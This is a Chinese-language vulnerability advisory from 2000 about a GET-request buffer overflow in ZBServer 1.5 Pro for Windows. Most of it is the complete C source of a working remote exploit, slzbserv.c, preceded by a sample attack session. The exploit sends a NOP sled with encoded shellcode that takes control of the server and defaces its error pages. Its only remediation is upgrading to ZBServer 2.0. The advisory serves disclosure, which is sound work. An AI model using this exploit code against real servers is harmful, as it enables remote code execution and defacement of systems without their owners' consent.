发布日期：2000-01-29
更新日期：2000-01-29

受影响系统：

ZBServer 1.5 Pro Edition for Microsoft Win98/NT

不受影响系统：

ZBServer 2.0

描述：

---

软件相关信息：
  
ZBserver 1.5是一个多功能的基于Internet/Intranet的软件包，它能提供的服务包括Web,Gopher,FTP和Chat.速度、价格、易用是他和其他同类产品竞争的优势，而且它支持Win9x和Windows NT，适合于各种内部和外部的TCP/IP用户。
  
漏洞描述：
  
UssLabs 发现了一个关于该软件包的本地/远程溢出，利用参数未经检查的get命令产生一个溢出，使得用户执行非法程序。

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

|Zan | <izan@galaxycorp.com >提供了一个针对西班牙版本NT/98的攻击程序:

% lynx http://xxx.xxx.xxx.xxx

WELCOME TO ... blah ... blah ..... (It's the root page)

% lynx xxx.xxx.xxx.xxx/ServerAbusedbyiZan.html

FILE NOT FOUND The request object (/ServerAbusedbyiZan.html) was not found.

% lynx xxx.xxx.xxx.xxx/FileNotAvailable.html

FILE NOT FOUND The request object (/FileNotAvailable.html) was not found.

$ zbsploit xxx.xxx.xxx.xxx

WinNT 4.0 sp5 ZBServer 1.50-r1x exploit http://mareasvivas.cjb.net  

Coded by -=[|Zan]=- izan@galaxycorp.com  

done.

$ lynx http://xxx.xxx.xxx.xxx

WELCOME TO ... blah ... blah ..... (It's the root page again)

% lynx http://xxx.xxx.xxx.xxx/ServerAbusedbyiZan.html

Hello. You are running a ZBServer PRO's buggy version and

you have been abused.

More information can be downloaded from

http://mareasvivas.cjb.net

regards to DeepZone crew (TheWizard, ^Anuska^ and Nemo)

Coded by |Zan.



% lynx xxx.xxx.xxx.xxx/FileNotAvailable.html

Server hacked.

Sploit coded by |Zan

%_


................................................


/** slzbserv.c - local/remote exploit for ZBServer PRO 1.50-r1x (WinNT)
**
** ZBServer PRO 1.50-r1x exploit gets remote servers's full control.
** When you attacks a vulnerable server you can run abitrary code
** inside. Firstly, sploit creates an advisory file. It's information
** for administrative use. Later, exploit restores and kills
** overflowed thread but before it patchs some error information so
** all error pages will appear like hacked pages.
**
** Compile on Debian with kernel 2.2.12: gcc -o slzbserv slzbserv.c
** run: ./slzbserv hostname
**
** http://mareasvivas.cjb.net /  
**
** Coded by |Zan | izan@galaxycorp.com
** **/


#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <sys/errno.h>
#include <netdb.h>

#define _PORT 80 #define _TamBuf 770

char crash[] = "GET /"
               "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
               "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
               "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
               "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
               "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
               "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
               "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
               "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
               "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
               "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
               "\x90\x90\x90\x90\x90\x81\xc7\xc8\x10\x10\x10\x81\xef\x10"
               "\x10\x10\x10\x57\x5e\x33\xc0\x66\xb8\x31\x02\x90\x90\x50"
               "\x59\xac\x34\x99\xaa\xe2\xfa\x71\x99\x99\x99\x99\xc4\x18"
               "\x74\xb1\x89\xd9\x99\xf3\x99\xf1\x19\x99\x99\x99\xf3\x9b"
               "\xf3\x99\xf3\x99\xf1\x99\x99\x99\xd9\x14\x2c\xac\x8b\xd9"
               "\x99\xcf\xf1\x19\x02\xd4\x99\xc3\x66\x8b\xc9\xc2\xf3\x99"
               "\x14\x24\x3a\x89\xd9\x99\xaa\x59\x32\x14\x2c\x3a\x89\xd9"
               "\x99\xcf\xf1\xd3\x98\x99\x99\x09\x14\x2c\x72\x89\xd9\x99"
               "\xcf\xca\xf1\x49\x05\xd4\x99\xc3\x66\x8b\xca\xf1\x05\x02"
               "\xd4\x99\xc3\x66\x8b\xf1\xa9\xd4\xde\x99\xc6\x14\x2c\x3e"
               "\x89\xd9\x99\xf3\xdd\x09\x09\x09\x09\xc0\x35\x33\x7b\x65"
               "\xf3\x99\x23\x31\x02\xd4\x99\x66\x8b\x99\x99\x99\x99\xca"
               "\xfc\xeb\xef\xfc\xeb\xb9\xf1\xf8\xfa\xf2\xfc\xfd\xb7\xa5"
               "\xb6\xf1\xab\xa7\xf1\xed\xed\xe9\xa3\xb6\xb6\xee\xee\xee"
               "\xb7\xfd\xfc\xfc\xe9\xe3\xf6\xf7\xfc\xb7\xf6\xeb\xfe\xb9"
               "\xb9\xca\xe9\xf5\xf6\xf0\xed\xb9\xfa\xf6\xfd\xfc\xfd\xb9"
               "\xfb\xe0\xb9\xe5\xc3\xf8\xf7\xb9\xe4\xa3\xb0\xa5\xf1\xed"
               "\xf4\xf5\xa7\xa5\xf1\xfc\xf8\xfd\xa7\xa5\xed\xf0\xed\xf5"
               "\xfc\xa7\xca\xfc\xeb\xef\xfc\xeb\xb9\xf1\xf8\xfa\xf2\xfc"
               "\xfd\xb7\xa5\xb6\xed\xf0\xed\xf5\xfc\xa7\xa5\xb6\xf1\xfc"
               "\xf8\xfd\xa7\xa5\xfb\xf6\xfd\xe0\xa7\xa5\xfa\xfc\xf7\xed"
               "\xfc\xeb\xa7\xd1\xfc\xf5\xf5\xf6\xb7\xb9\xc0\xf6\xec\xb9"
               "\xf8\xeb\xfc\xb9\xeb\xec\xf7\xf7\xf0\xf7\xfe\xb9\xf8\xb9"
               "\xc3\xdb\xca\xfc\xeb\xef\xfc\xeb\xb9\xc9\xcb\xd6\xea\xb9"
               "\xfb\xec\xfe\xfe\xe0\xb9\xef\xfc\xeb\xea\xf0\xf6\xf7\xb9"
               "\xf8\xf7\xfd\xb9\xe0\xf6\xec\xb9\xf1\xf8\xef\xfc\xb9\xfb"
               "\xfc\xfc\xf7\xb9\xf8\xfb\xec\xea\xfc\xfd\xb7\xa5\xe9\xa7"
               "\xd4\xf6\xeb\xfc\xb9\xf0\xf7\xff\xf6\xeb\xf4\xf8\xed\xf0"
               "\xf6\xf7\xb9\xfa\xf8\xf7\xb9\xfb\xfc\xb9\xfd\xf6\xee\xf7"
               "\xf5\xf6\xf8\xfd\xb9\xff\xeb\xf6\xf4\xb9\xf1\xed\xed\xe9"
               "\xa3\xb6\xb6\xee\xee\xee\xb7\xfd\xfc\xfc\xe9\xe3\xf6\xf7"
               "\xfc\xb7\xf6\xeb\xfe\xb9\xf6\xeb\xb9\xf1\xed\xed\xe9\xa3"
               "\xb6\xb6\xf4\xf8\xeb\xfc\xf8\xea\xef\xf0\xef\xf8\xea\xb7"
               "\xfa\xf3\xfb\xb7\xf7\xfc\xed\xa5\xe9\xa7\xeb\xfc\xfe\xf8"
               "\xeb\xfd\xea\xb9\xed\xf6\xb9\xdd\xfc\xfc\xe9\xc3\xf6\xf7"
               "\xfc\xb9\xfa\xeb\xfc\xee\xb9\xb1\xcd\xf1\xfc\xce\xf0\xe3"
               "\xf8\xeb\xfd\xb5\xb9\xd8\xf7\xec\xea\xf2\xf8\xb9\xf8\xf7"
               "\xfd\xb9\xd7\xfc\xf4\xf6\xb0\xa5\xe9\xa7\xda\xf6\xfd\xfc"
               "\xfd\xb9\xfb\xe0\xb9\xe5\xc3\xf8\xf7\xb7\xa5\xb6\xfa\xfc"
               "\xf7\xed\xfc\xeb\xa7\xa5\xb6\xfb\xf6\xfd\xe0\xa7\xa5\xb6"
               "\xf1\xed\xf4\xf5\xa7\xb7\xc5\xf1\xed\xf4\xf5\xc5\xca\xfc"
               "\xeb\xef\xfc\xeb\xd8\xfb\xec\xea\xfc\xfd\xfb\xe0\xf0\xc3"
               "\xf8\xf7\xb7\xf1\xed\xf4\xf5\x99\x90\x90\x90\x90\x90\x90"
               "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
               "\x90\x90\x90\x90\x90\xac\xe0\xe3\x01";


int sock; struct sockaddr_in sock_a; struct hostent *host;

int main (int argc, char *argv[])
{

printf("\nWinNT 4.0 sp5 ZBServer PRO 1.50-r1x exploit\n");
printf("http://mareasvivas.cjb.net\n\n");
printf("Coded by -=[ |Zan ]=- izan@galaxycorp.com \n\n");

if(argc < 2)
{
    fprintf(stderr, "Error : Usage: %s <hostname> \n", argv[0]);
    exit(0);
}


if((host=(struct hostent *)gethostbyname(argv[1])) == NULL)
  {
    perror("gethostbyname");
    exit(-1);
  }

if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0)
  {
    perror("create socket");
    exit(-1);
  }

sock_a.sin_family=AF_INET;
sock_a.sin_port=htons(_PORT);
memcpy((char *)&sock_a.sin_addr,(char *)host->h_addr,host->h_length);
if(connect(sock,(struct sockaddr *)&sock_a,sizeof(sock_a))!=0)
  {
    perror("create connect");
    exit(-1);
  }

fflush(stdout);

write(sock,crash,_TamBuf);
write(sock,"\n\n", 2);
printf("done.\n\n");

}
................................................

建议：

---

更新到ZBServer 2.0
http://www.zbsoft.com/zbserver/index.htm

浏览次数：7567
严重程度：0（网友投票）